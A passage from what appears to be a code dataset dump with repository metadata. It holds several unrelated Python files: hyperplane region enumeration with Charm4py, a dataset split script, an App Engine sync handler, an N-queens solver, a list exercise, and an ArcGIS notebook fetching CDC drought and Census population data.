connecting interiorPoint to the origin point doesn't pass through the current\n # face, then we shouldn't explore this region from *the current* region (another will count it)\n # This face is stored in the third position of an element of successorList\n if interiorPoint is None:\n print(f'PE {charm.myPe()}: Something went wrong for region {INTrep}')\n else:\n rayEval = (H[:,0] + (H[:,1:] @ interiorPoint).flatten()).flatten() / (-H[:,1:] @ (-interiorPoint + self.flippedConstraints.pt)).flatten()\n #print(rayEval)\n rayScalar = np.min( np.where( rayEval < 0, np.inf, rayEval ) )\n rayHit = interiorPoint + rayScalar * (self.flippedConstraints.pt - interiorPoint)\n\n H2[INTrep,:] = -H2[INTrep,:]\n currentRegionIsParent = np.all(-H2[:,1:] @ rayHit - H2[:,0].reshape(-1,1) <= self.tol + self.rTol * np.abs(H2[:,0].reshape(-1,1)))\n H2[INTrep,:] = -H2[INTrep,:]\n if currentRegionIsParent:\n #print(f'PE {charm.myPe()}: Visiting {successorList[ii][1]}')\n peToUse = -1\n if self.rsPeFree and not self.rsDone:\n peToUse = self.rsScheduler.schedNextFreePE(ret=True).get()\n if peToUse >= 0:\n self.thisProxy[peToUse].reverseSearch(successorList[ii][1],payload=successorList[ii][6],witness=interiorPoint)\n else:\n self.thisProxy[self.thisIndex].reverseSearch(successorList[ii][1],payload=successorList[ii][6],witness=interiorPoint,awaitable=True).get()\n if self.doRSCleanup:\n self.thisProxy[self.thisIndex].cleanupRS(successorList,witnessList,awaitable=True).get()\n self.rsDepth -= 1\n if self.rsDepth == 0:\n self.rsScheduler.freePe(charm.myPe(),awaitable=True).get()\n return\n\n\n\n @coro\n def retrieveFaces(self,fut):\n fut.send( (charm.myPe(), self.workInts) )\n\n @coro\n def processNodeSuccessorsCDD(self,INTrep,N,H2,solver='glpk'):\n H = copy(H2)\n # global H2\n # H = np.array(H2)\n # H = np.array(processNodeSuccessors.H)\n idx = 1\n for i in range(N):\n if INTrep & idx > 0:\n H[i] = -1*H[i]\n idx = idx << 1\n\n mat = cdd.Matrix(H,number_type='float')\n mat.rep_type = cdd.RepType.INEQUALITY\n ret = mat.canonicalize()\n to_keep = sorted(list(frozenset(range(len(H))) - ret[1]))\n if len(ret[0]) > 0:\n orig_to_keep = to_keep\n # There is some degeneracy, which means CDD screwed up (numerical ill-conditioning?)\n # Hence, we will use a direct implementation to find a minimal H-Representation\n to_keep = self.concreteMinHRep(H,copyMat=False,solver=solver)\n if orig_to_keep != to_keep:\n print('Linear regions found? 
' + ('YES' if len(ret[0])>0 else 'NO'))\n print('CDD-obtained to_keep was:')\n print(orig_to_keep)\n print('GLPK Simplex-based Minimal H-Representation yielded to_keep of:')\n print(to_keep)\n # Use this to keep track of the region's faces\n facesInt = 0\n for k in to_keep:\n facesInt = facesInt + (1 << k)\n\n successors = []\n for i in range(len(to_keep)):\n if to_keep[i] >= N:\n break\n idx = 1 << to_keep[i]\n if idx & INTrep <= 0:\n successors.append( \\\n INTrep + idx \\\n )\n cont = self.thisProxy[self.thisIndex].hashAndSend(INTrep + idx,ret=True).get()\n if not cont:\n return [set(successors), -1]\n\n return [set(successors), facesInt]\n\n\n @coro\n def concreteMinHRep(self,H2,constraint_list_in,boolIdxNoFlip,intIdxNoFlip,intIdx,solver='glpk',interiorPoint=None):\n witnessList = []\n safe = False\n if len(intIdx) == 0:\n return [], []\n\n restricted = False if constraint_list_in is None else True\n\n # H2 should be a view into the CDD-formatted H matrix selected by taking boolIdx or intIdx rows thereof\n if interiorPoint is not None:\n H = H2 if not restricted else H2[constraint_list_in[0:len(H2)],:]\n else:\n # This version of H has an extra row, that we can use for the another constraint\n H = np.vstack([H2, [H2[0,:]] ]) if not restricted else np.vstack([H2[constraint_list_in,:], [H2[0,:]] ])\n\n to_keep = []\n constraint_list = np.full(len(H),True,dtype=bool)\n if restricted:\n restIdxs = np.nonzero(constraint_list_in)[0]\n offsetTab = dict(zip(restIdxs,range(len(restIdxs))))\n for idx in range(len(intIdx)):\n if restricted and (not constraint_list_in[intIdx[idx]]):\n continue\n offsetIdx = intIdx[idx] if not restricted else offsetTab[intIdx[idx]]\n if self.useQuery:\n boolIdxNoFlip[intIdx[idx]//8] = boolIdxNoFlip[intIdx[idx]//8] | (1<<(intIdx[idx]%8))\n insertIdx = 0\n while insertIdx < len(intIdxNoFlip) and intIdxNoFlip[insertIdx] < intIdx[idx]:\n insertIdx += 1\n temp = copy(intIdxNoFlip)\n temp.insert(insertIdx,intIdx[idx])\n # q = self.thisProxy[self.thisIndex].query( bytes(np.packbits(boolIdx,bitorder='little')), ret=True).get()\n q = self.thisProxy[self.thisIndex].query( [boolIdxNoFlip, tuple(temp), self.flippedConstraints.N], ret=True).get()\n boolIdxNoFlip[intIdx[idx]//8] = boolIdxNoFlip[intIdx[idx]//8] ^ (1<<(intIdx[idx]%8))\n # print('PE' + str(charm.myPe()) + ' Queried table with node ' + str(origInt) + ' and received reply ' + str(q))\n # If the node corresponding to the hyperplane we're about to flip is already in the table\n # then treat it as redundant and skip it (saving the LP)\n if q[0] > 0:\n continue\n if interiorPoint is None:\n # Set the extra row to the negation of the pre-relaxed current constraint\n H[-1,:] = -H2[intIdx[idx],:]\n H[offsetIdx,0] += 1\n status, x = self.lp.runLP( \\\n H2[intIdx[idx],1:], \\\n -H[constraint_list,1:], \\\n H[constraint_list,0], \\\n lpopts = self.lpopts, \\\n msgID = str(charm.myPe()) \\\n )\n H[offsetIdx,0] -= 1\n\n if status != 'optimal' and (safe or status != 'primal infeasible') and status != 'dual infeasible':\n print('******************** PE' + str(charm.myPe()) + ' WARNING!! 
********************')\n print('PE' + str(charm.myPe()) + ': Infeasible or numerical ill-conditioning detected at node' )\n print('PE ' + str(charm.myPe()) + ': RESULTS MAY NOT BE ACCURATE!!')\n return [set([]), 0]\n if (safe and -H2[intIdx[idx],1:]@x < H2[intIdx[idx],0]) \\\n or (not safe and (status == 'primal infeasible' or np.all(-H2[intIdx[idx],1:]@x - H2[intIdx[idx],0] <= self.tol + self.rTol * np.abs(H[:,0].reshape(-1,1))))):\n # inequality is redundant, so skip it\n constraint_list[offsetIdx] = False\n else:\n to_keep.append(idx)\n else:\n H[offsetIdx,:] = -H[offsetIdx,:]\n x = region_helpers.findInteriorPoint(H,solver=solver,lpObj=self.lpIntPoint,tol=self.tol,rTol=self.rTol,lpopts=self.lpopts)\n H[offsetIdx,:] = -H[offsetIdx,:]\n if x is not None:\n # If x satisfies all of the original constraints then it is a redundant hyperplane\n # intersecting with at least d other hyperplanes\n notAdjacent = np.all(-H[:,1:] @ x - H[:,0].reshape(-1,1) <= self.tol + self.rTol * np.abs(H[:,0].reshape(-1,1)))\n if notAdjacent:\n constraint_list[offsetIdx] = False\n else:\n to_keep.append(idx)\n witnessList.append(x)\n else:\n constraint_list[offsetIdx] = False\n if restricted:\n # We are not solving full LPs, so the witness points aren't meaningful...\n return to_keep, []\n else:\n return to_keep, witnessList\n\n @coro\n def processNodeSuccessorsFastLP(self,INTrep,N,H,payload=[],solver='glpk',lpopts={},witness=None,xN=None,face=None,adj=None):\n # INTrep = INTrep[0]\n # We assume INTrep is a list of integers representing the hyperplanes that CAN'T be flipped\n # t = time.time()\n witnessList = []\n INTrep, boolIdxNoFlip, intIdx, intIdxNoFlip = self.decodeRegionStore(INTrep)\n\n\n # Flip the un-flippable hyperplanes; this must be undone later\n H[INTrep,:] = -H[INTrep,:]\n\n\n d = H.shape[1]-1\n\n\n\n constraint_list = None\n\n\n faces, witnessList = self.thisProxy[self.thisIndex].concreteMinHRep(H,constraint_list,boolIdxNoFlip,intIdxNoFlip,intIdx,solver=solver,interiorPoint=witness,ret=True).get()\n\n successors = []\n for idx in range(len(faces)):\n i = faces[idx]\n if boolIdxNoFlip[intIdx[i]//8] & 1<<(intIdx[i] % 8) == 0:\n # boolIdxNoFlip[intIdx[i]] = 1\n # t = time.time()\n boolIdxNoFlip[intIdx[i]//8] = boolIdxNoFlip[intIdx[i]//8] | 1<<(intIdx[i] % 8)\n insertIdx = 0\n while insertIdx < len(intIdxNoFlip) and intIdxNoFlip[insertIdx] < intIdx[i]:\n insertIdx += 1\n temp = copy(intIdxNoFlip)\n temp.insert(insertIdx,intIdx[i])\n successors.append( \\\n [ copy(boolIdxNoFlip), tuple(temp), self.flippedConstraints.N, (intIdx[i],) if self.sendFaces else tuple() , None if witness is None else witnessList[idx], None, None ]\n )\n boolIdxNoFlip[intIdx[i]//8] = boolIdxNoFlip[intIdx[i]//8] ^ 1<<(intIdx[i] % 8)\n # self.conversionTime += time.time() - t\n t = time.time()\n if not self.doRS:\n cont = self.thisProxy[self.thisIndex].hashAndSend(successors[-1],ret=True).get()\n else:\n cont = True\n self.stats['xferTime'] += time.time() - t\n\n if not cont:\n H[INTrep,:] = -H[INTrep,:]\n return successors, -1, witnessList\n if not self.doRS and self.sendFaces and not isinstance(self.clearTable,str):\n self.thisProxy[self.thisIndex].hashAndSend([copy(boolIdxNoFlip),copy(intIdxNoFlip),self.flippedConstraints.N,[copy(ii[3][0]) for ii in successors]], ret=True).get()\n # facesInt = np.full(self.N,0,dtype=bool)\n sel = tuple(np.array(intIdx,dtype=np.uint64)[faces].tolist())\n # facesInt[sel] = np.full(len(sel),1,dtype=bool)\n\n # Undo the flip we did before, since it affects a referenced (as opposed to copied) 
array:\n H[INTrep,:] = -H[INTrep,:]\n\n # return [successors, bytes(np.packbits(facesInt,bitorder='little'))]\n if not self.doRS:\n return [], sel, witnessList\n else:\n return successors, sel, witnessList\n\n @coro\n def processNodeSuccessorsInsertHyperplane(self,INTrep,N,H,payload=[],solver='glpk',lpopts={},witness=None,xN=None,face=None,adj=None):\n witnessList = []\n # Note the N passed here includes the inserted hyperplane, and INTrep will always be of the same length\n boolIdxNoFlipFull, INTrepFull, _ = region_helpers.recodeRegNewN(0, INTrep, N)\n boolIdxNoFlip, INTrep, _ = region_helpers.recodeRegNewN(-1, INTrep, N)\n # INTrep, boolIdxNoFlip, intIdx, intIdxNoFlip = self.decodeRegionStore(INTrep)\n\n # We have to retrieve the information from the node in the table that is going to be split\n q = self.thisProxy[self.thisIndex].query( [boolIdxNoFlip, INTrep, N-1], ret=True).get()\n if q[0] > 0:\n oldFace = q[1]\n oldWitness = q[2]\n oldAdj = q[3]\n oldPayload = q[4]\n else:\n raise ValueError\n print(f'()()() q = {q}')\n rebasedINTrep = set(region_helpers.recodeRegNewN(-1,self.flippedConstraints.rebaseRegion(INTrepFull),N))\n validFlips = oldFace - rebasedINTrep\n\n\n # Flip the un-flippable hyperplanes; this must be undone later\n # Again note that H contains the inserted hyperplane\n H[INTrep,:] = -H[INTrep,:]\n\n\n d = H.shape[1]-1\n\n\n\n constraint_list = None\n\n\n H[INTrep,:] = -H[INTrep,:]\n\n\n\n\ndef Union(contribs):\n return set().union(*contribs)\n\nReducer.addReducer(Union)\n\ndef DictAccum(contribs):\n result = defaultdict(int)\n for trib in contribs:\n for ky in trib.keys():\n result[ky] += trib[ky]\n return result\n\nReducer.addReducer(DictAccum)\n\ndef DictListJoin(contribs):\n result = defaultdict(list)\n for trib in contribs:\n for ky in trib.keys():\n result[ky] += trib[ky]\n return result\n\nReducer.addReducer(DictListJoin)\n\ndef DictSetUnion(contribs):\n result = defaultdict(set)\n for trib in contribs:\n for ky in trib.keys():\n result[ky] |= trib[ky]\n return result\n\nReducer.addReducer(DictSetUnion)\n\n","repo_name":"jferlez/HyperplaneRegionEnum","sub_path":"posetFastCharm.py","file_name":"posetFastCharm.py","file_ext":"py","file_size_in_byte":61505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"20989403700","text":"#_*_coding:utf-8_*_\n\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\ntrain_data = pd.read_csv('../data/raw_data/train_set.csv',sep=',')\ntest_data = pd.read_csv('../data/raw_data/test_set.csv',sep=',')\n# count the number of class categories\nclass_label_num = train_data.groupby('class').count()\n'''\ntrain_test_split: random_state is the random seed; fixing it (e.g. random_state=0) makes the split reproducible, while leaving it unset gives a different split on every run\n'''\ntrain_dataset,val_dataset = 
train_test_split(train_data.iloc[1:],test_size=0.1,random_state=0)\n\ntrain_dataset.to_csv('../data/split_data/train_set.csv',index=False)\nval_dataset.to_csv('../data/split_data/val_set.csv',index=False)\n\ntrain_dataset[['article','class']].to_csv('../data/article/train_set.csv',index=False)\nval_dataset[['article','class']].to_csv('../data/article/val_set.csv',index=False)\ntest_data[['article']].to_csv('../data/article/test_set.csv',index=False)\n\ntrain_dataset[['word_seg','class']].to_csv('../data/word/train_set.csv',index=False)\nval_dataset[['word_seg','class']].to_csv('../data/word/val_set.csv',index=False)\ntest_data[['word_seg']].to_csv('../data/word/test_csv.csv',index=False)\n","repo_name":"TianWuYuJiangHenShou/textClassifier","sub_path":"data_processing/data_process.py","file_name":"data_process.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"37"}
{"seq_id":"759218349","text":"import webapp2\nfrom jinja_templates import jinja_environment\nimport spreadsheet_index\nimport datastore_index\nfrom main import decorator\n\n\nclass SyncMassesHandler(webapp2.RequestHandler):\n\n    @decorator.oauth_required\n    def get(self):\n        # get the contents of the index spreadsheet\n        index_masses_mgr = spreadsheet_index.Masses(oauth_decorator=decorator)\n        self.index_masses = index_masses_mgr.sync_table()\n\n        # get the contents of the datastore\n        datastore_masses_mgr = datastore_index.Masses()\n        self.datastore_masses = datastore_masses_mgr.sync_table()\n\n        # copy the data in the index to the datastore\n        # get the rows for which biblerefs are updated during registration\n        updated_index_rows = datastore_masses_mgr.bulkload_table(self.index_masses)\n\n        # update the spreadsheet index entries\n        index_masses_mgr.update_fields(updated_index_rows)\n\n        # find obsolete datastore entities (no spreadsheet index entry with same id)\n        obsolete_entities = {}\n        self.find_obsolete_entities(obsolete_entities)\n\n        # delete the obsolete datastore entities\n        datastore_masses_mgr.delete_entities(obsolete_entities)\n\n        # the app redirects the user to the index\n        template = jinja_environment.get_template('list-masses.html')\n        self.response.out.write(template.render(masses=self.datastore_masses))\n\n    def find_obsolete_entities(self, d):\n        index_ids = [i['id'] for i in self.index_masses]\n        for i in self.datastore_masses:\n            id = i['id']\n            if id not in index_ids:\n                d[id] = {}\n\n","repo_name":"vicmortelmans/catholicmissale","sub_path":"sync_masses_index.py","file_name":"sync_masses_index.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"22675719036","text":"# time over: this brute-force version exceeds the judge's time limit\n\ndef check(row, col, chk_arr, n):\n    for i in range(n):\n        if i == row:\n            continue\n        if chk_arr[i][col]:\n            return False\n\n    x = row - 1\n    y = col - 1\n    while x >= 0 and y >= 0:\n        if chk_arr[x][y]:\n            return False\n        x -= 1\n        y -= 1\n\n    x = row - 1\n    y = col + 1\n    while x >= 0 and y < n:\n        if chk_arr[x][y]:\n            return False\n        x -= 1\n        y += 1\n\n    return True\n\ndef calc(row, chk_arr, ans, n):\n    if row == n:\n        ans[0] += 1\n        return\n\n    for col in range(n):\n        chk_arr[row][col] = True\n        if check(row, col, chk_arr, n):\n            calc(row + 1, chk_arr, ans, n)\n        chk_arr[row][col] = False\n\n\nans = [0]\nn = int(input())\nchk_arr = [[False] * n for i in range(n)]\ncalc(0, chk_arr, ans, n)\nprint(ans[0])\n","repo_name":"ino-jeong/study-practice","sub_path":"baekjoon online 
judge/09663 n_queen/n_queen(2).py","file_name":"n_queen(2).py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"17841676054","text":"my_pizzas = ['margarita', 'hawaiana', 'sweet pork', 'sweet pork philadelpia']\n\nfriend_pizzas = my_pizzas[:]\n\nmy_pizzas.append('bacon supreme')\n\nfriend_pizzas.append('paisa')\n\nprint(f'my favorite pizzas are: ')\n\nfor pizza in my_pizzas:\n\tprint(pizza)\n\nprint(f\"my friend's favorite pizzas are: \")\nfor pizza in friend_pizzas:\n\tprint(pizza)","repo_name":"3venjd/PythonCrashCourse","sub_path":"Chapter_4/excercise4_11.py","file_name":"excercise4_11.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"19596403501","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Section 1 : Reading a CSV and Creating a Point FeatureClass of Plot Data\n\n# ## Step 1.\n# **Import Python Modules**\n# - arc modules\n#     - arcgis gives access to arcgis api\n#     - arcpy gives access to everything available in arcpro software (functions, layout etc.)\n# - other modules\n#     - pandas is used for data analysis and manipulation\n#     - numpy also used for data analysis and manipulation (some pandas reliant on numpy)\n#     - sodapy is a module recommended by CDC to use their API\n#     - zipfile used to unzip zipfiles\n#     - os gives access to basic functionalities of the computer (creating folders, path names, etc.)\n\n# In[1]:\n\n\nimport arcgis\nimport arcpy\nimport pandas as pd\nimport numpy as np\nimport sodapy\nfrom zipfile import ZipFile\nimport os\nimport json\nimport requests\n\n\n# ## Step 2.\n# **set up inputs to convert CSV to featureclass**\n\n# In[2]:\n\n\n# set up directory and geodatabase\n\nspace = arcpy.GetParameterAsText(0)\n# space = \"C:\\\\Users\\\\hjs5td\\\\Desktop\"\n\nincsv = arcpy.GetParameterAsText(1)\n#\"C:\\\\Users\\\\hjs5td\\\\Box Sync\\\\FIA Project\\\\FIA_Python\\\\plot_sample_9May19.csv\"\n\n# these are the names of longitude and latitude in your CSV \n\nlongitude = arcpy.GetParameterAsText(2)\n#'lon'\n\nlatitude = arcpy.GetParameterAsText(3)\n#'lat'\n\nplot_year = arcpy.GetParameterAsText(4) \n#\"invyr\"\n\nusename = arcpy.GetParameterAsText(5)\n\npasswrd = arcpy.GetParameterAsText(6)\n\nkey = arcpy.GetParameterAsText(7)\n\n\n# ## Step 3.\n# **create a geodatabase where we will store our data**\n\n# In[3]:\n\n\noutgdb = \"AdvGIS_proj.gdb\"\nworkspace = os.path.join(space, outgdb)\n\nif arcpy.Exists(workspace):\n    arcpy.Delete_management(workspace)\n\narcpy.CreateFileGDB_management(space,outgdb)\n\narcpy.env.workspace = workspace\narcpy.env.overwriteOutput = True\n\n\n# ## Step 4.\n# **create a featureclass from CSV**\n\n# In[4]:\n\n\n#define name of featureclass to go into geodatabase\nplots = \"plots\"\nplottab = \"plot_table\"\n\n#GCS_WGS_1984 geographic coordinate system\nsr = arcpy.SpatialReference(4326)\n\n# web mercator\n#sr = arcpy.SpatialReference(3857)\n\n#USA_Contiguous_Albers_Equal_Area_Conic_USGS_version projected coordinate system\npr = arcpy.SpatialReference(102039) \n\n#from pyproj import Proj,transform\n\n#arcpy.TableToTable_conversion(incsv,workspace,plottab)\n\n#cursor = arcpy.da.UpdateCursor(plottab, [longitude,latitude])\n\n#for row in cursor:\n#    lon = row[0]\n#    lat = row[1]\n#    newsr = transform(Proj(init='epsg:3857'), Proj(init='epsg:4326'), lon, lat)\n#    newlon = newsr[0]\n#    newlat = newsr[1]\n#    newrow = [newlon, newlat]\n#    
cursor.updateRow(newrow)\n \n#del cursor\n\n# assume WGS 1984\n\narcpy.XYTableToPoint_management(incsv,plots, x_field = longitude, y_field = latitude, coordinate_system = sr)\n\n\n\nplots_proj = 'plots_proj'\n\ntransformation = 'WGS_1984_(ITRF00)_To_NAD_1983'\n\n#going from sr to pr coordinate system\n\narcpy.Project_management(plots, plots_proj, pr, transformation, sr)\n\n\n# # Section 2 : Accessing APIS and Getting Explanatory Data\n\n# # Download a Layer From ArcGIS hub\n# http://hub.arcgis.com/pages/open-data\n\n# ## Step 1.\n# **Set up text inputs for accessing various API's**\n\n# In[7]:\n\n\n# inputs:\n\n# username and password of arcgis account\n\n# census can be requested at : https://api.census.gov/data/key_signup.html \n\n\n# ## Step 2. \n# **set up numeric variables to be used for PDSI API**\n\n# In[8]:\n\n\n# used in the sql clause for CDC API\n# does not require a key or username+pass\n\nminmonth = 6\nmaxmonth = 8\nminyear = 1998\n\n\n# ## Step 3.\n# **get URL of a county feature layer from arcgis hub website.**\n\n# In[9]:\n\n\nURL = \"https://services.arcgis.com/P3ePLMYs2RVChkJx/arcgis/rest/services/USA_Counties_Generalized/FeatureServer/0/\"\ncounty_layer = arcgis.features.FeatureLayer(URL)\ncounty_layer\n\n\n# **you can use the code below to see what is allowed with this dataset; it says \"extract\" you can directly download the layer as shapefile. see https://developers.arcgis.com/python/guide/checking-out-data-from-feature-layers-using-replicas/**\n\n# In[10]:\n\n\ncounty_layer.properties.capabilities\n\n\n# ## Step 4.\n# **create a GIS() object; plot a map using the created GIS() object.** Need to create an account in order to download layers directly -- (my username and password are provided in the tool for simplicity)\n\n# In[11]:\n\n\n#gis1 = arcgis.gis.GIS(username=usename, password=passwrd)\n#map1 = gis1.map(\"Missouri\")\n#map1\n\n\n# In[12]:\n\n\n## add to a map from a url\n\n#map1.add_layer({\"type\":\"FeatureLayer\",\n# \"url\":URL,\n# })\n\n\n# In[13]:\n\n\n## print the names of the fields\n#for f in county_layer.properties.fields:\n# print(f.name)\n\n\n# ## Step 5.\n# **query all features of the layer.**\n\n# In[14]:\n\n\nall_features = county_layer.query()\n\n#print('Total number of rows in the dataset: ')\n#print(len(all_features.features))\n\n\n# ## Step 6. \n# **create spatial dataframe from the county_layer.**\n\n# In[15]:\n\n\n# store as dataframe pandas dataframe\n# this works if we can extract the features\n\n\nsdf = pd.DataFrame.spatial.from_layer(county_layer)\n\n#View first 5 rows\n\nprint(sdf.head())\n\n\n# **plot the spatial dataframe on the arcgis map, and print out the head.**\n\n# In[16]:\n\n\n#sdf.spatial.plot(map_widget=map1)\n\n\n# ## Step 7. \n# **delete the columns that we do not need**\n\n# In[17]:\n\n\nprint(list(sdf))\n\n\n# In[18]:\n\n\nkeeperlist = ['FID', 'FIPS', 'OBJECTID', 'SHAPE', 'SQMI', 'STATE_FIPS', 'STATE_NAME', 'Shape_Area', 'Shape_Leng', \n 'Shape__Area', 'Shape__Length']\n\n# FIPS = sdf.FIPS\n# print(FIPS.head())\n\nfor i in list(sdf):\n if not i in keeperlist:\n del sdf[i]\n\nprint(list(sdf)) \n\n\n# # Get and Format Drought Data\n# https://open.cdc.gov/apis.html\n\n# ## Step 8.\n# **create a string that can take inputs of minimum year, minimum month and maximum month.**\n# \n\n# In[19]:\n\n\n# from our inputs ... 
this will control which months the drought data is gathered from (1-12 would get all months)\n# I have set it to 6-8 because we have found that june through august is most important for forest conditions\n# later on the palmer drought severity index values are averaged over these months\n\nmonthlist = list(range(minmonth,maxmonth+1))\nfinal = str()\nlength = len(monthlist) - 1\n\nfor idx,i in enumerate(monthlist):\n if idx < length:\n string1 = \"'{}',\".format(i)\n final = final + string1\n else:\n string1 = \"'{}'\".format(i)\n final = final + string1\n \nmonthstring = \" AND month IN ({})\".format(final)\n\n# minimum value for this clause is 1894\nclause = \"year > '{}'\".format(minyear) + monthstring\n\nprint(clause)\n\n\n# ## Step 9. \n# **Using sodapy library (recommended by CDC) get the drought data from CDC API.** set limit to something large so we get all records (if excluded will only get 1000).\n\n# In[20]:\n\n\n# this gets the pdsi data from cdc website using the query speciried in the get() function\n\nclient = sodapy.Socrata(\"data.cdc.gov\", None)\nresults = client.get(\"en5r-5ds4\", where=clause, limit = 10000000)\npdsi = pd.DataFrame.from_records(results)\n\nclient.close()\n\n\n# In[21]:\n\n\nprint(pdsi.head(5))\nprint(len(pdsi))\n\n\n# ## Step 10.\n# **change datatypes of all columns.**\n\n# In[22]:\n\n\n# make sure all countyfips are stored as integers\n# countyfips is used to join to the layer\n# these are originally stored as text\n\nintlist = [\"countyfips\",\"year\",\"month\",\"statefips\"]\n\nfor i in list(pdsi):\n if i in intlist:\n pdsi[str(i)] = pd.to_numeric(pdsi[str(i)],downcast='integer')\n else:\n pdsi[str(i)] = pd.to_numeric(pdsi[str(i)],downcast='float')\n\n \n\n\n# ## Step 11.\n# **iterate through yearlist and store dataframes in dictionary.** merge all dataframes to one dataframe called all_drought.\n\n# In[23]:\n\n\n\n# get the maximum value from pdsi[\"year\"] column\nmaxyear = max(pdsi[\"year\"])\n\n# min year plus one because we used > min year not => minyear\n# we will iterate through this list and use values as keys/column names\n\nyearlist = list(range(minyear+1,maxyear+1))\n\n# create dictionary to easily store dataframes as we iterate\nD = {}\n\n# enumerate the list so we can know when we are on the first iteration (see below)\n\nfor idx,i in enumerate(yearlist):\n # get values where year == i\n D[i] = pdsi[pdsi.year == i]\n # monthlist defined in step 8\n D[i] = D[i][D[i].month.isin(monthlist)]\n # groupby county and find the average pdsi across the months in our list\n D[i] = D[i].groupby(['countyfips'])[['pdsi']].mean().reset_index()\n # get a string of the value in yearlist\n yearsuf = str(i)\n # create a column name\n pdsiname = \"pdsi{}\".format(yearsuf)\n # reassign the column name to the PDSI column\n D[i] = D[i].rename(columns={'pdsi': pdsiname})\n # if it is the first iteration than store the dataframe as all_drought\n if idx == 0:\n all_drought = D[i]\n # otherwise merge the dataframes on the county number\n else:\n all_drought = all_drought.merge(D[i], how='inner', on='countyfips')\n # print(len(all_drought))\n\ndel D\n\n\n# In[24]:\n\n\nprint(all_drought.head())\n\n\n# ## Step 12.\n# **Make sure that FIPS in the spatial dataframe is stored as an integer. 
Then merge the drought data to the county data using the countyfips and FIPS keys.**\n\n# In[25]:\n\n\nsdf['FIPS'] = pd.to_numeric(sdf['FIPS'],downcast='integer')\n\n\n# In[26]:\n\n\npdsicounty = sdf.merge(all_drought, how='inner', left_on='FIPS', right_on='countyfips')\n\n\n# In[27]:\n\n\nprint(pdsicounty.head())\n\n\n# In[28]:\n\n\nprint(list(pdsicounty))\n\n\n# ## Step 13.\n# **write our merged spatial dataframe to a feature class.** store it in the geodatabase.\n\n# In[29]:\n\n\npdsipath = os.path.join(workspace,\"pdsi\")\n\npdsicounty.spatial.to_featureclass(location = pdsipath)\n\n\n# # Get and Download Population Data\n\n# ## Step 14.\n# **access the census API for county level population estimates for years 2000 to 2010**\n\n# In[30]:\n\n\n## see https://api.census.gov/data/2000/pep/int_population/examples.html ##\n\n# this gets county level population estimates from 2000 to 2010\n\nURL = \"https://api.census.gov/data/2000/pep/int_population?get=COUNTY,DATE_DESC,POP,GEONAME&for=county:*&in=state:*&key={}\".format(key)\n\ndata = requests.get(URL)\n\ndata\n\n\n# ## Step 15.\n# **convert json to nested list using the json() function**\n\n# In[31]:\n\n\ndatajson = data.json()\n\n\n# ## Step 16.\n# **use pandas to write a dataframe from the datajson list**\n\n# In[32]:\n\n\ncp = pd.DataFrame.from_records(datajson)\n\n\n# In[33]:\n\n\nprint(cp.head())\nprint(len(cp))\n\n\n# In[34]:\n\n\nlist(cp)\n\n\n# ## Step 17.\n# **make the first row the column names and drop that row**\n\n# In[35]:\n\n\ncp.columns = cp.iloc[0]\ncp = cp.reindex(cp.index.drop(0))\n\n\n# In[36]:\n\n\nprint(list(cp))\nprint(len(cp))\n\n\n# In[37]:\n\n\nprint(cp.head())\n\n\n# ## Step 18.\n# **do the same thing for county level data from 2010 to 2018**\n\n# In[38]:\n\n\n\n# if we do not include \"DATE_CODE\" then we only get the 2018 estimate\nURL = \"https://api.census.gov/data/2018/pep/population?get=COUNTY,DATE_CODE,DATE_DESC,POP,GEONAME&for=county:*&in=state:*&key={}\".format(key)\n\ndata = requests.get(URL)\n\ndatajson = data.json()\n\n\n# In[39]:\n\n\nncp = pd.DataFrame.from_records(datajson)\n\nncp.columns = ncp.iloc[0]\nncp = ncp.reindex(ncp.index.drop(0))\n\n# delete DATE_CODE\ndel ncp[\"DATE_CODE\"]\n\n\n# ## Step 19. \n# **concatenate the two dataframes (stack them on top of one another); must have same columns; reset the index so that all values are unique and delete the old index column**\n\n# In[40]:\n\n\n# since we redefine cp here make sure that we rerun the first request sequence before we concatenate dataframes again\n\ncp = pd.concat([ncp,cp], axis=0, sort = False, join='outer',ignore_index=True)\n\n\n# In[41]:\n\n\ncp = cp.reset_index()\n\n\n# In[42]:\n\n\ndel cp[\"index\"]\n\n\n# ## Step 20. 
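# A note ahead of Step 20: the FIPS code is rebuilt below by string-concatenating
# the state and county codes, which only works because the Census API zero-pads
# the county code to three digits. A defensive sketch of the same assembly
# (make_fips is an illustrative helper, not part of this notebook):

def make_fips(state, county):
    # Zero-pad to the canonical 2-digit state + 3-digit county layout first.
    return int(str(state).zfill(2) + str(county).zfill(3))

assert make_fips("29", "1") == 29001   # bare concatenation would give 291
assert make_fips(29, 510) == 29510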
\n# **iterate through the indexes of the cp dataframe to format the FIPS and year variables.** I tried using the datetime package but it was simpler to just format it on my own.\n\n# In[43]:\n\n\nstringlist = [\"population estimate\", \"population estimates base\",\"Census 2010 population\",\"Census population\"]\n\n# create an empty column year\ncp[\"year\"] = \"\"\n#create an empty column FIPS\ncp[\"FIPS\"] = \"\"\n#create an empty list to store year values\nyearlist = list()\n\n# iterate through the indexes\n# iterating through a pandas dataframe\nfor i in cp.index:\n    datestr = cp.at[i,\"DATE_DESC\"]\n    county = str(cp.at[i,\"county\"])\n    state = str(cp.at[i,\"state\"])\n    FIPS = int(state + county)\n    cp.at[i,\"FIPS\"] = FIPS\n    # if any(x in datestr for x in stringlist):\n    for y in stringlist:\n        # check to see if datestr created above ends with any value in the list\n        if datestr.endswith(y):\n            # get the length of the text that the datestr endswith\n            length = len(y)\n            # create a negative integer value from that length\n            position = -length\n            # new string excluding that text\n            new_datestr = datestr[:position]\n            # new string excluding month and day\n            # includes the space and the year I believe\n            new_year = new_datestr[-5:]\n            # convert to integer\n            year = int(new_year)\n            # assign value\n            cp.at[i,\"year\"] = year\n            # to check the min and max later on\n            yearlist.append(year)\n\n# we need to drop duplicates because each county includes a baseline 2000 census estimate and an additional 2000 estimate\n# I sort 